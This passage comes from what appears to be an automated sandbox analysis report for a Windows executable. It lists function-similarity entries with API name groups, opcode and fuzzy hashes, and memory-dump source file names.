              • String ID:
              • API String ID: 2735977093-0
              • Opcode ID: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
              • Instruction ID: eb7332db7f165f027367f4732026c4c5e1ffc84dd66e6814e4cbb0aaa670ffe8
              • Opcode Fuzzy Hash: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
              • Instruction Fuzzy Hash: 2C216532208B8086D725CF16B44079AB7A5F7887E4F488725FF9917BA5DF79C551C700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: FolderFreeFromListLocationPathTaskwcslen
              • String ID:
              • API String ID: 4012708801-0
              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AllocCriticalHeapSection$EnterLeave
              • String ID:
              • API String ID: 830345296-0
              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AllocHeapmemsetwcscpywcslen
              • String ID:
              • API String ID: 1807340688-0
              • Opcode ID: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
              • Instruction ID: 6743f53f77a36836f55a7605488c5dfe466d4e7a0e85049e430ca513693cbf19
              • Opcode Fuzzy Hash: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
              • Instruction Fuzzy Hash: 6D3109B5605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518350
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Heap$Free$Alloc
              • String ID:
              • API String ID: 3901518246-0
              • Opcode ID: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
              • Instruction ID: 5bc8d6a19ab5820ea12ddcb4c1614eb0e390fbda2a9c6e8bfd6285e08278190a
              • Opcode Fuzzy Hash: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
              • Instruction Fuzzy Hash: B73142B2211B409BE702DF13EA807A977A4F788BC0F448429EB4847B65DF79E4A6C740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AllocCriticalHeapSection$EnterLeave
              • String ID:
              • API String ID: 830345296-0
              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: ByteCharMultiWidemalloc
              • String ID:
              • API String ID: 2735977093-0
              • Opcode ID: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
              • Instruction ID: 40dc39d6401ac23dbbf15f28fc1e93d87451d781889f5abbfcb2521dceb51717
              • Opcode Fuzzy Hash: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
              • Instruction Fuzzy Hash: 3A118F3260878086EB25CF66B41076ABBA5FB8CBE4F544328EF9D57BA5DF39C4118704
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CriticalFreeHeapSection$EnterLeave
              • String ID:
              • API String ID: 1298188129-0
              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: FreeHeap$CriticalSection$EnterLeavememset
              • String ID:
              • API String ID: 4254243056-0
              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740